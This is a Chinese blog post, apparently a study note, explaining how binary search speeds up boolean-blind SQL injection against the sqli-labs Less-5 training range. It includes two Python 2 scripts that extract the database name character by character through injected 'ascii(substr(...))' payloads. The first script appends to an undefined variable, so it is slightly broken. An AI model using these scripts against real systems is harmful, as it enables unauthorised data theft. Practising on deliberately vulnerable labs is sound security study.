二分查找在sql盲注里面的应用

前言

最近在重新复习SQL注入用了sqllabs这个靶场，发现在做盲注的时候自己写的脚本，就一直自增去盲注的话时间花费太大，所以就在看了看二分查找在这一方面的应用
确实快了不少，很久没有写过小脚本就手有点生疏了，赶紧记录一下

正文

二分查找又称折半查找，优点是比较次数少，查找速度快，平均性能好；其缺点是要求待查表为有序表，且插入删除困难。因此，折半查找方法适用于不经常变动而查找频繁的有序列表。首先，假设表中元素是按升序排列，将表中间位置记录的关键字与查找关键字比较，如果两者相等，则查找成功；否则利用中间位置记录将表分成前、后两个子表，如果中间位置记录的关键字大于查找关键字，则进一步查找前一子表，否则进一步查找后一子表。重复以上过程，直到找到满足条件的记录，使查找成功，或直到子表不存在为止，此时查找不成功。

时间复杂度

最优时间复杂度：O(1)
最坏时间复杂度：O(logn)

可以自行对比一下两组代码的不同
这是自增的写法

#!/usr/bin/python
# Author:0verWatch
# coding:utf-8

import requests


url = "http://192.168.100.102/sqlilabs/Less-5/?id=1%27 and ascii(substr((select database()),{_},1))={__} %23"
#注意一下这里使用=去作为判断条件

database = ''

for i in range(1,50):
    for j in range(65,127):
        payload = url.format(_ = i,__ = j)
        #print payload
        ans  = requests.get(payload)
        #print ans.content
        if 'You are in...........' in ans.content:
            # database = database + chr(j)
            # print database
            table_name += chr(j)
            print table_name
            break

下面是使用二分法去搜索，我这里使用非递归的办法去实现二分查找

#!/usr/bin/python
# Author:0verWatch
# coding:utf-8

import requests

url = "http://192.168.100.102/sqlilabs/Less-5/?id=1%27 and ascii(substr((select database()),{_},1))>{__} %23"
#注意一下这里使用>去作为判断条件

database = ''

for  i  in range(1,15):  #这个地方可能会有些问题，数据库长度未知的时候过长会出现重复字母到时候自行删除即可
    min = 65
    max = 122
    while abs(max - min) > 1:
        mid = (max + min)//2
        payload = url.format(_=i,__ = mid)
        ans = requests.get(payload)
        print payload
        if 'You are in...........' in ans.content:
            min = mid
        else:
            max = mid

    database += chr(max)
    print database